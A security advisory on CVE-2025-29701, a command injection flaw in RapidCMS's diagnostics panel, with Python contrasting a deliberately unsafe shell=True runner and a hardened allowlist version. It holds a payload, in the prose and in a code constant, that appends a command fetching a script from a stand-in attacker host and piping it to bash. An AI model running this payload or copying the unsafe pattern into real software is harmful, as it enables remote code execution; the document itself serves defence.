A new high-severity vulnerability, CVE-2025-29701, has surfaced in the content management framework RapidCMS, affecting versions 2.3.0 through 2.4.5. The flaw is an unauthenticated OS command injection in the diagnostic utility served under /admin/tools/diagnostics. When a user submits input to the "Network Diagnostic" panel, in particular the ping or traceroute fields, the backend splices that input into a shell command string without sanitizing it, so shell metacharacters in the field are interpreted by the shell and an attacker gains remote code execution as the account running the web application. Exploitation is trivial: a target value such as 8.8.8.8 && curl attacker.com/shell.sh | bash appends an attacker-controlled command to the legitimate ping. What makes this more dangerous is that the endpoint is exposed on many default installations, so mass exploitation is feasible; Shodan shows over 1,400 exposed instances, many on education and municipal networks. The vendor has patched the issue in version 2.4.6, which escapes shell arguments with shlex.quote() in Python and whitelists the arguments the panel will accept.
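To make the flaw concrete, the following Python is an added example written for this page; it is not RapidCMS source code and the function names, the argument lists for ping and traceroute, and the hostname grammar are assumptions. It places the vulnerable pattern (user input formatted into a shell string and run with shell=True) beside the kind of fix the vendor describes: validate the target against an allowlist of what a host can look like, restrict the tool to a fixed set of command templates, and hand the arguments to subprocess as a list so no shell is involved at all. shlex.quote() is shown for the case where a shell string genuinely must be produced, for example for an audit log.

```python
import ipaddress
import re
import shlex
import subprocess

# Constructed payload mirroring the advisory's example; not a real capture.
INJECTION_PAYLOAD = "8.8.8.8 && curl attacker.com/shell.sh | bash"


def build_vulnerable_command(target: str) -> str:
    """The flawed pattern: untrusted input is spliced into a shell string.

    With shell=True the '&&' and '|' in the target are interpreted by /bin/sh,
    so anything after the address runs as the web application's user.
    """
    return f"ping -c 4 {target}"


def run_vulnerable(target: str) -> subprocess.CompletedProcess:
    # Deliberately unsafe; kept only to show the pattern being fixed.
    return subprocess.run(build_vulnerable_command(target), shell=True,
                          capture_output=True, text=True)


# Allowlist grammar for a hostname (RFC 1123 style labels, assumed here):
# labels of 1-63 alphanumerics or hyphens that do not start or end with a
# hyphen, total length at most 253. Anything else is rejected, including
# whitespace, shell metacharacters and leading '-' (which could otherwise be
# parsed by ping as an option).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"([a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)

# Fixed command templates: the only tools and flags the panel may run.
# Flag values are assumptions for this example.
ALLOWED_TOOLS = {
    "ping": ["ping", "-c", "4"],
    "traceroute": ["traceroute", "-m", "15"],
}


def is_safe_target(target: str) -> bool:
    """Accept a literal IPv4/IPv6 address or a hostname matching the grammar."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return bool(HOSTNAME_RE.match(target))


def build_hardened_command(tool: str, target: str) -> list[str]:
    """Return an argv list for subprocess; raises ValueError on bad input."""
    if tool not in ALLOWED_TOOLS:
        raise ValueError(f"tool not allowed: {tool!r}")
    if not is_safe_target(target):
        raise ValueError(f"rejected target: {target!r}")
    # A list of arguments is passed straight to execve(); no shell parses it.
    return ALLOWED_TOOLS[tool] + [target]


def run_hardened(tool: str, target: str) -> subprocess.CompletedProcess:
    return subprocess.run(build_hardened_command(tool, target),
                          capture_output=True, text=True, timeout=30)


def render_for_log(argv: list[str]) -> str:
    """If a shell-safe string is needed (audit log, support ticket), quote each
    argument with shlex.quote() instead of joining raw strings."""
    return " ".join(shlex.quote(a) for a in argv)


if __name__ == "__main__":
    print("vulnerable string:", build_vulnerable_command(INJECTION_PAYLOAD))
    for candidate in ("8.8.8.8", "example.org", INJECTION_PAYLOAD, "-f"):
        print(f"{candidate!r:50} safe={is_safe_target(candidate)}")
    print("hardened argv:", build_hardened_command("ping", "8.8.8.8"))
    print("quoted for log:", render_for_log(["ping", "-c", "4", INJECTION_PAYLOAD]))
```

The validation step is what actually closes the hole: passing a list to subprocess removes the shell from the path, and the allowlist of tools and targets stops the panel from being turned into a general command runner. shlex.quote() on its own is only a correct defence when the quoted string is consumed by a POSIX shell; it does nothing for arguments that reach a program which parses its own options, which is why leading-hyphen values are rejected by the grammar as well.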
If your instance is public-facing, patch to 2.4.6 immediately. If you cannot patch yet, mitigate by blocking access to /admin/tools from external IPs at the reverse proxy or firewall, but treat that as a stopgap: it reduces exposure without removing the flaw, and an attacker already on the internal network can still reach the panel. It is also worth reviewing web server logs for requests to /admin/tools/diagnostics whose ping or traceroute parameters contain shell metacharacters such as &&, ;, | or $( ). Bug bounty hunters should keep an eye out, especially on instances still using the default admin path. This CVE is a prime example of how a single unsanitized field can turn a server into an attack vector.